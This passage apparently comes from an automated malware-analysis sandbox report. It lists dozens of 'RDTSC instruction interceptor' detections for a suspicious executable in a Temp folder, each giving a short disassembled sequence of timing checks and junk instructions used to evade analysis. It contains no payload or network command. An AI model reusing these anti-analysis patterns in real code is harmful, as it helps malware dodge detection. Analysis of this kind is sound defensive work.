push ebx 0x00000043 pop ebx 0x00000044 pop edi 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 pushad 0x00000049 jmp 00007FC4CCEF6AE9h 0x0000004e jc 00007FC4CCEF6AD6h 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 push edi 0x00000058 pop edi 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71BED second address: D71C3A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC4CC910588h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 add edx, 37BAB008h 0x0000002c add dword ptr [ebp+122D33DAh], ebx 0x00000032 lea eax, dword ptr [ebp+12485539h] 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jo 00007FC4CC910586h 0x00000042 push esi 0x00000043 pop esi 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71C3A second address: D518D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC4CCEF6ADEh 0x0000000f nop 0x00000010 js 00007FC4CCEF6ADCh 0x00000016 and ecx, dword ptr [ebp+122D3AB9h] 0x0000001c call dword ptr [ebp+122D1D26h] 0x00000022 jl 00007FC4CCEF6AFBh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c push esi 0x0000002d pop esi 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA01D2 second address: DA01D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA01D6 second address: DA01DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA0368 second address: DA0380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC910594h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA0380 second address: DA03A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jnp 00007FC4CCEF6AD6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA2036 second address: DA203A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA203A second address: DA205B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC4CCEF6AE5h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA362F second address: DA364B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910596h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8A78 second address: DA8A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8A7E second address: DA8A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8A83 second address: DA8A9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FC4CCEF6AD6h 0x00000013 jno 00007FC4CCEF6AD6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8A9C second address: DA8ACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Bh 0x00000007 ja 00007FC4CC910586h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FC4CC910586h 0x00000017 jmp 00007FC4CC910596h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8ACF second address: DA8AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA7896 second address: DA78A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FC4CC910586h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA78A5 second address: DA78A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA78A9 second address: DA78CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FC4CC91059Ch 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA78CE second address: DA78D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC4CCEF6AD6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA7A5A second address: DA7A64 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA7A64 second address: DA7A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC4CCEF6AD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA7E3E second address: DA7E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA7490 second address: DA749B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007FC4CCEF6AD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8104 second address: DA8108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8108 second address: DA8155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE8h 0x00000007 jng 00007FC4CCEF6AD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FC4CCEF6ADFh 0x00000014 jp 00007FC4CCEF6ADEh 0x0000001a push eax 0x0000001b push edx 0x0000001c jbe 00007FC4CCEF6AD6h 0x00000022 jnl 00007FC4CCEF6AD6h 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8155 second address: DA816F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC4CC91058Eh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA816F second address: DA8173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8173 second address: DA8179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8433 second address: DA843E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC4CCEF6AD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA843E second address: DA8464 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC4CC910591h 0x00000008 jmp 00007FC4CC91058Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FC4CC91058Bh 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DADF2D second address: DADF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD1B2 second address: DAD1B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD1B6 second address: DAD1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jp 00007FC4CCEF6AD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD2F2 second address: DAD2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD2F6 second address: DAD302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FC4CCEF6AD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD302 second address: DAD321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD321 second address: DAD327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD327 second address: DAD32D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD32D second address: DAD333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD333 second address: DAD338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD338 second address: DAD33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD861 second address: DAD870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD9B9 second address: DAD9BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD9BD second address: DAD9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD9C3 second address: DAD9C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DADD8A second address: DADDA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jns 00007FC4CC910586h 0x0000000b push eax 0x0000000c pop eax 0x0000000d jng 00007FC4CC910586h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 ja 00007FC4CC91058Eh 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAC832 second address: DAC836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D1F81D second address: D1F827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC4CC910586h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D1F827 second address: D1F82D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D1F82D second address: D1F833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB5D4E second address: DB5D60 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FC4CCEF6AE9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB5D60 second address: DB5D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC91058Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC4CC91058Bh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB5D80 second address: DB5DA2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 jmp 00007FC4CCEF6ADFh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB5DA2 second address: DB5DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC4CC91058Ch 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB8C4E second address: DB8C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB866A second address: DB86A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jns 00007FC4CC910586h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC4CC910594h 0x00000018 jmp 00007FC4CC910597h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB89AA second address: DB89AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB89AE second address: DB89B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB89B4 second address: DB89BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBAC1E second address: DBAC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBAC22 second address: DBAC2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBADB0 second address: DBADE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FC4CC910595h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBADE6 second address: DBADEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC0BC9 second address: DC0BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC0BCF second address: DC0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC0BD5 second address: DC0BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBFE87 second address: DBFEAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE4h 0x00000007 jns 00007FC4CCEF6AD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FC4CCEF6AE2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBFEAD second address: DBFEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBFFF5 second address: DC0001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC0141 second address: DC0174 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC4CC910586h 0x00000008 jmp 00007FC4CC910593h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007FC4CC910586h 0x00000018 pop ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f jo 00007FC4CC910586h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC05FD second address: DC0620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE9h 0x00000007 jnp 00007FC4CCEF6AD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC0620 second address: DC0630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC91058Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC4E6F second address: DC4E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC500B second address: DC5018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC5018 second address: DC501C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC52FF second address: DC5323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4CC910591h 0x00000008 jmp 00007FC4CC91058Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71591 second address: D715E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FC4CCEF6ADCh 0x0000000c popad 0x0000000d push eax 0x0000000e jnl 00007FC4CCEF6AE8h 0x00000014 nop 0x00000015 sub edx, dword ptr [ebp+124766D5h] 0x0000001b push 00000004h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FC4CCEF6AD8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 nop 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D715E9 second address: D715ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
